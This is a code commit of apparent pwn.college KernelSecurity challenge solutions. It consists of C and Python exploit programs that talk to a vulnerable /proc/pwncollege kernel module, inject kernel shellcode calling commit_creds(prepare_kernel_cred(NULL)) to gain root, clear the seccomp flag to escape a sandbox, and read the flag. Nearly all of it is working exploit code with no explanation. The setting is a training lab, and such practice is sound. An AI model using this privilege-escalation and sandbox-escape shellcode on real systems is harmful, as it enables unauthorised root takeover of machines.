Added Level 3.0 ~ 8.1 of KernelSecurity in PwnCollege

PwnCollege/KernelSecurity/Level3.0/exploit.c

@@ -0,0 +1,8 @@
+#include <stdlib.h>
+#include <fcntl.h>
+#include <unistd.h>
+int main() {
+    int fd = open("/proc/pwncollege", O_WRONLY);
+    write(fd, "oiwqgsfsdekebbgi", 0x10);
+    execve("/bin/bash", NULL, NULL);
+}

PwnCollege/KernelSecurity/Level3.1/exploit.c

@@ -0,0 +1,8 @@
+#include <stdlib.h>
+#include <fcntl.h>
+#include <unistd.h>
+int main() {
+    int fd = open("/proc/pwncollege", O_WRONLY);
+    write(fd, "ysrxhmxtsfctmnuv", 0x10);
+    execve("/bin/bash", NULL, NULL);
+}

PwnCollege/KernelSecurity/Level4.0/exploit.c

@@ -0,0 +1,10 @@
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <fcntl.h>
+#include <unistd.h>
+
+int main() {
+    int fd = open("/proc/pwncollege", O_WRONLY);
+    ioctl(fd, 1337, "owibidryoofhkxuo");
+    execve("/bin/bash", NULL, NULL);
+}

PwnCollege/KernelSecurity/Level4.1/exploit.c

@@ -0,0 +1,10 @@
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <fcntl.h>
+#include <unistd.h>
+
+int main() {
+    int fd = open("/proc/pwncollege", O_WRONLY);
+    ioctl(fd, 1337, "amykdifilzqobpdg");
+    execve("/bin/bash", NULL, NULL);
+}

PwnCollege/KernelSecurity/Level5.0/exploit.c

@@ -0,0 +1,10 @@
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <fcntl.h>
+#include <unistd.h>
+
+int main() {
+    int fd = open("/proc/pwncollege", O_WRONLY);
+    ioctl(fd, 1337, 0xffffffffc0000000ull + 0x8edull);
+    execve("/bin/bash", NULL, NULL);
+}

PwnCollege/KernelSecurity/Level5.1/exploit.c

@@ -0,0 +1,10 @@
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <fcntl.h>
+#include <unistd.h>
+
+int main() {
+    int fd = open("/proc/pwncollege", O_WRONLY);
+    ioctl(fd, 1337, 0xffffffffc0000000ull + 0xc2ull);
+    execve("/bin/bash", NULL, NULL);
+}

PwnCollege/KernelSecurity/Level6.0/exploit.c

@@ -0,0 +1,24 @@
+#include <stdlib.h>
+#include <stdint.h>
+#include <sys/ioctl.h>
+#include <fcntl.h>
+#include <unistd.h>
+
+__attribute__((naked))
+void shellcode() {
+    asm volatile(
+        "xor %rdi, %rdi\n"
+        "movabs $0xffffffff81089660, %rsi\n"
+        "callq *%rsi\n" // prepare_kernel_cred
+        "movq %rax, %rdi\n"
+        "movabs $0xffffffff81089310, %rsi\n"
+        "callq *%rsi\n" // commit_creds
+        "retq\n"
+    );
+}
+
+int main() {
+    int fd = open("/proc/pwncollege", O_WRONLY);
+    write(fd, (void *)shellcode, 0x1F);
+    execve("/bin/bash", NULL, NULL);
+}

PwnCollege/KernelSecurity/Level7.0/exploit.c

@@ -0,0 +1,34 @@
+#include <stdlib.h>
+#include <stdint.h>
+#include <string.h>
+#include <sys/ioctl.h>
+#include <fcntl.h>
+#include <unistd.h>
+
+struct ioctl_args {
+    uint64_t length;
+    uint8_t shellcode[0x1000];
+    uint64_t codeptr;
+}args;
+
+__attribute__((naked))
+void shellcode() {
+    asm volatile(
+        "xor %rdi, %rdi\n"
+        "movabs $0xffffffff81089660, %rsi\n"
+        "callq *%rsi\n" // prepare_kernel_cred
+        "movq %rax, %rdi\n"
+        "movabs $0xffffffff81089310, %rsi\n"
+        "callq *%rsi\n" // commit_creds
+        "retq\n"
+    );
+}
+
+int main() {
+    args.length = 0x1f;
+    memcpy(args.shellcode, shellcode, args.length);
+    args.codeptr = 0xffffc90000085000ull;
+    int fd = open("/proc/pwncollege", O_WRONLY);
+    ioctl(fd, 1337, &args);
+    execve("/bin/bash", NULL, NULL);
+}

PwnCollege/KernelSecurity/Level8.0/shellcode.py

@@ -0,0 +1,36 @@
+import sys
+sys.path.append("..")
+
+from pwn import context, shellcraft
+from common import *
+context(arch = 'amd64', os = 'linux')
+
+kernel_assembly = f"""
+/* current->thread_info.flags &= ~(1 << TIF_SECCOMP); */
+mov     rdx, gs:0x15d00             /* runtime-relocated offsets */
+mov     rax, [rdx]
+and     ah, 0xfe
+mov     [rdx], rax
+/* commit_creds(prepare_kernel_cred(NULL)); */
+xor     rdi, rdi
+movabs  rsi, 0xffffffff81089660
+call    rsi                         /* prepare_kernel_cred */
+mov     rdi, rax
+movabs  rsi, 0xffffffff81089310
+call    rsi                         /* commit_creds */
+ret
+""".strip()
+
+kernel_machine_code = dump_machine_code(kernel_assembly)
+
+user_assembly = f"""
+{shellcraft.amd64.pushstr(kernel_machine_code, append_null=False)}
+{shellcraft.amd64.linux.syscall("SYS_write", 3, "rsp", len(kernel_machine_code))}
+{shellcraft.amd64.linux.cat("/flag")}
+""".strip()
+
+user_machine_code = dump_machine_code(user_assembly)
+
+with open('shellcode.bin', 'wb') as f:
+    f.write(user_machine_code)
+    f.write(b'\xcc' * (0x1000 - len(user_machine_code)))

PwnCollege/KernelSecurity/Level8.0/test_seccomp.c

@@ -0,0 +1,8 @@
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/cred.h>
+MODULE_LICENSE("GPT");
+
+void* test_unset_seccomp_flag_in_thread_info_flags(void) {
+    return current->thread_info.flags &= ~(1 << TIF_SECCOMP);
+}

PwnCollege/KernelSecurity/common.py

@@ -0,0 +1,30 @@
+from pwn import asm, disasm, util
+import struct
+
+def i2f(x):
+    return struct.unpack('!d', struct.pack('!Q', x))[0]
+
+def f2i(x):
+    return struct.unpack('!Q', struct.pack('!d', x))[0]
+
+def dump_machine_code(assembly: str):
+    machine_code = asm(assembly)
+    print("Assembly:")
+    print(assembly)
+    print("Byte Array:", list(machine_code))
+    padding = b"\xcc" * ((4 - len(machine_code)) % 4)
+    unpacked_signed_array = util.packing.unpack_many(machine_code + padding, 32, endian='little', sign=True)
+    unpacked_unsigned_array = util.packing.unpack_many(machine_code + padding, 32, endian='little', sign=False)
+    print("Signed DWord Array:", unpacked_signed_array)
+    print("Unsigned DWord Array:", unpacked_unsigned_array)
+    print("Hex DWord Array:", list(map(hex, unpacked_unsigned_array)))
+    padding = b"\xcc" * ((8 - len(machine_code)) % 8)
+    unpacked_signed_array = util.packing.unpack_many(machine_code + padding, 64, endian='little', sign=True)
+    unpacked_unsigned_array = util.packing.unpack_many(machine_code + padding, 64, endian='little', sign=False)
+    print("Signed QWord Array:", unpacked_signed_array)
+    print("Unsigned QWord Array:", unpacked_unsigned_array)
+    print("Hex QWord Array:", list(map(hex, unpacked_unsigned_array)))
+    print("Double Array:", list(map(i2f, unpacked_unsigned_array)))
+    print("Disassembled-assembly:")
+    print(disasm(machine_code))
+    return machine_code